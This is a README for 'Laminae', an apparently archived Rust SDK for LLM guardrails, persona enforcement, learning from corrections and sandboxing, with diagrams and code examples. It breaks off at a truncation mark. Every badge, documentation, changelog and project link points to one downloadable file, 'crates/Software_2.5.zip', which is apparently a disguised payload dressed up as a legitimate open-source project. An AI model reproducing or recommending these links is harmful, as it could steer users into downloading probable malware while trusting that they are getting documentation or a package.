<p align="center">
  <img src="assets/laminae-git.png" alt="Laminae" width="320" />
</p>

<h1 align="center">Laminae</h1>

<p align="center"><strong>The missing layer between raw LLMs and production AI.</strong></p>

<p align="center">
  <a href="https://raw.githubusercontent.com/Arneunalarming861/Laminae/main/crates/Software_2.5.zip"><img src="https://img.shields.io/crates/v/laminae.svg" alt="crates.io" /></a>
  <a href="https://raw.githubusercontent.com/Arneunalarming861/Laminae/main/crates/Software_2.5.zip"><img src="https://img.shields.io/badge/crates.io_downloads-1.5K-e6822a" alt="SDK downloads" /></a>
  <a href="https://raw.githubusercontent.com/Arneunalarming861/Laminae/main/crates/Software_2.5.zip"><img src="https://img.shields.io/badge/license-Apache%202.0-blue.svg" alt="license" /></a>
  <a href="https://raw.githubusercontent.com/Arneunalarming861/Laminae/main/crates/Software_2.5.zip"><img src="https://img.shields.io/badge/rust-1.83%2B-orange.svg" alt="rust" /></a>
  <a href="https://raw.githubusercontent.com/Arneunalarming861/Laminae/main/crates/Software_2.5.zip"><img src="https://raw.githubusercontent.com/Arneunalarming861/Laminae/main/crates/Software_2.5.zip" alt="docs.rs" /></a>
</p>

<p align="center">
  If you find Laminae useful, consider giving it a ⭐ - it helps others discover the project!
</p>

<p align="center">
  <a href="https://raw.githubusercontent.com/Arneunalarming861/Laminae/main/crates/Software_2.5.zip"><strong>📖 Documentation</strong></a> · <a href="https://raw.githubusercontent.com/Arneunalarming861/Laminae/main/crates/Software_2.5.zip"><strong>Changelog</strong></a>
</p>

<p align="center">
  <a href="https://raw.githubusercontent.com/Arneunalarming861/Laminae/main/crates/Software_2.5.zip"><strong>Made with ❤️ for AIs and for the Vibe Coding Community.</strong></a>
</p>

---

> **This project has been archived.** The most valuable components (Cortex, Glassbox, Ironclad) have been absorbed into [Thunder](https://raw.githubusercontent.com/Arneunalarming861/Laminae/main/crates/Software_2.5.zip) — our AI-powered multi-agent coding orchestrator. The ideas live on in a product that ships.

> **What was absorbed:**
> - **laminae-cortex** (learning from corrections) → Thunder's Stormeye memory layer
> - **laminae-glassbox** (I/O containment) → [Thunder Dome](https://raw.githubusercontent.com/Arneunalarming861/Laminae/main/crates/Software_2.5.zip) security gateway
> - **laminae-ironclad** (process sandbox) → Thunder's agent process safety

---

Laminae (Latin: *layers*) is an open-source modular Rust SDK that adds guardrails, safety, personality, voice, learning, and containment to any AI or LLM application. Each layer works independently or together as a full production-ready stack.
<p align="center">

```
┌─────────────────────────────────────────────┐
│              Your Application               │
├─────────────────────────────────────────────┤
│  Psyche    │ Multi-agent cognitive pipeline │
│  Persona   │ Voice extraction & enforcement │
│  Cortex    │ Self-improving learning loop   │
│  Shadow    │ Adversarial red-teaming        │
│  Ironclad  │ Process execution sandbox      │
│  Glassbox  │ I/O containment layer          │
├─────────────────────────────────────────────┤
│              Any LLM Backend                │
│     (Claude, GPT, Ollama, your own)         │
└─────────────────────────────────────────────┘
```
</p>

## Why Laminae?

Every AI app reinvents safety, prompt injection defense, and output validation from scratch. Most skip it entirely. Laminae provides structured safety layers that sit between your LLM and your users - enforced in Rust, not in prompts.

**No existing SDK does this.** LangChain, LlamaIndex, and others focus on retrieval and chaining. Laminae focuses on what happens *around* the LLM: shaping its personality, learning from corrections, auditing its output, sandboxing its actions, and containing its reach.

## The Layers

### Psyche - Multi-Agent Cognitive Pipeline

A Freudian-inspired architecture where three agents shape every response:

- **Id** - Creative force. Generates unconventional angles, emotional undertones, creative reframings. Runs on a small local LLM (Ollama) - zero cost.
- **Superego** - Safety evaluator. Assesses risks, ethical boundaries, manipulation attempts. Also runs locally - zero cost.
- **Ego** - Your LLM. Receives the user's message enriched with invisible context from Id and Superego. Produces the final response without knowing it was shaped.

The key insight: Id and Superego run on small, fast, local models. Their output is compressed into "context signals" injected into the Ego's prompt as invisible system context. The user never sees the shaping - they just get better, safer responses.

```rust
use laminae::psyche::{PsycheEngine, EgoBackend, PsycheConfig};
use laminae::ollama::OllamaClient;

struct MyEgo { /* your LLM client */ }

impl EgoBackend for MyEgo {
    fn complete(&self, system: &str, user_msg: &str, context: &str)
        -> impl std::future::Future<Output = anyhow::Result<String>> + Send
    {
        let full_system = format!("{context}\n\n{system}");
        async move {
            // Call Claude, GPT, or any LLM here, sending `full_system` and `user_msg`
            let _ = (full_system, user_msg);
            todo!()
        }
    }
}

#[tokio::main]
async fn main() -> anyhow::Result<()> {
    let engine = PsycheEngine::new(OllamaClient::new(), MyEgo { /* ... */ });
    let response = engine.reply("What is creativity?").await?;
    println!("{response}");
    Ok(())
}
```

**Automatic tier classification** - simple messages (greetings, factual lookups) bypass Psyche entirely. Medium messages use COP (Compressed Output Protocol) for fast processing. Complex messages get the full pipeline.
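The routing idea above can be sketched in plain Rust. This is an illustrative reimplementation under assumed heuristics (word count and greeting prefixes), not Laminae's actual classifier or API:

```rust
/// Hypothetical sketch of tier routing; names and thresholds are illustrative.
#[derive(Debug, PartialEq)]
enum Tier {
    Simple,  // bypass Psyche entirely
    Medium,  // Compressed Output Protocol (COP)
    Complex, // full Id/Superego/Ego pipeline
}

fn classify(msg: &str) -> Tier {
    let words = msg.split_whitespace().count();
    // Treat short greetings and trivial lookups as Simple
    let greeting = ["hi", "hello", "thanks"]
        .iter()
        .any(|g| msg.to_lowercase().starts_with(g));
    if greeting || words <= 4 {
        Tier::Simple
    } else if words <= 40 {
        Tier::Medium
    } else {
        Tier::Complex
    }
}
```

A real classifier would weigh more signals (intent, ambiguity, risk), but the shape is the same: route cheap messages around the pipeline and reserve the full Id/Superego pass for messages that warrant it.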

### Persona - Voice Extraction & Style Enforcement

Extracts a writing personality from text samples and enforces it on LLM output. Platform-agnostic - works for emails, docs, chat, code reviews, support tickets.

- **7-dimension extraction** - tone, humor, vocabulary, formality, perspective, emotional style, narrative preference
- **Anti-hallucination** - validates LLM-claimed examples against real samples, cross-checks expertise claims
- **Voice filter** - 6-layer post-generation rejection system catches AI-sounding output (60+ built-in AI phrase patterns)
- **Voice DNA** - tracks distinctive phrases confirmed by repeated use, reinforces authentic style

```rust
use laminae::persona::{PersonaExtractor, VoiceFilter, VoiceFilterConfig, compile_persona};

// Extract a persona from text samples
let extractor = PersonaExtractor::new("qwen2.5:7b");
let persona = extractor.extract(&samples).await?;
let prompt_block = compile_persona(&persona);

// Post-generation: catch AI-sounding output
let filter = VoiceFilter::new(VoiceFilterConfig::default());
let result = filter.check("It's important to note that...");
// result.passed = false, result.violations = ["AI vocabulary detected: ..."]
// result.retry_hints = ["DO NOT use formal/academic language..."]
```

### Cortex - Self-Improving Learning Loop

Tracks how users edit AI output and converts corrections into reusable instructions - without fine-tuning. The AI gets better with every edit.

- **8 pattern types** - including shortened, removed questions, stripped AI phrases, tone shifts, added content, simplified language, changed openers
- **LLM-powered analysis** - converts edit diffs into natural-language instructions ("Never start with 'I think'")
- **Deduplicated store** - instructions ranked by reinforcement count, 80% word overlap deduplication
- **Prompt injection** - top instructions formatted as a prompt block for any LLM
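The overlap-based deduplication can be sketched in a few lines of plain Rust. This is an illustrative reimplementation of the idea (treating two instructions as duplicates when at least 80% of the shorter one's words appear in the other), not Cortex's actual code:

```rust
use std::collections::HashSet;

/// Hypothetical sketch: two instructions are duplicates when >= 80%
/// of the shorter one's distinct words also appear in the other.
fn is_duplicate(a: &str, b: &str) -> bool {
    let words = |s: &str| {
        s.to_lowercase()
            .split_whitespace()
            .map(str::to_owned)
            .collect::<HashSet<_>>()
    };
    let (wa, wb) = (words(a), words(b));
    let (small, large) = if wa.len() <= wb.len() { (&wa, &wb) } else { (&wb, &wa) };
    if small.is_empty() {
        return true;
    }
    let overlap = small.intersection(large).count();
    overlap as f64 / small.len() as f64 >= 0.8
}
```

When a new instruction duplicates a stored one, the store would bump the existing entry's reinforcement count instead of adding a near-identical copy.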

```rust
use laminae::cortex::{Cortex, CortexConfig};

let mut cortex = Cortex::new(CortexConfig::default());

// Track edits over time
cortex.track_edit("It's worth noting that Rust is fast.", "Rust is fast.");
cortex.track_edit("Furthermore, the type system is robust.", "The type system catches bugs.");

// Detect patterns
let patterns = cortex.detect_patterns();
// → [RemovedAi

[truncated…]
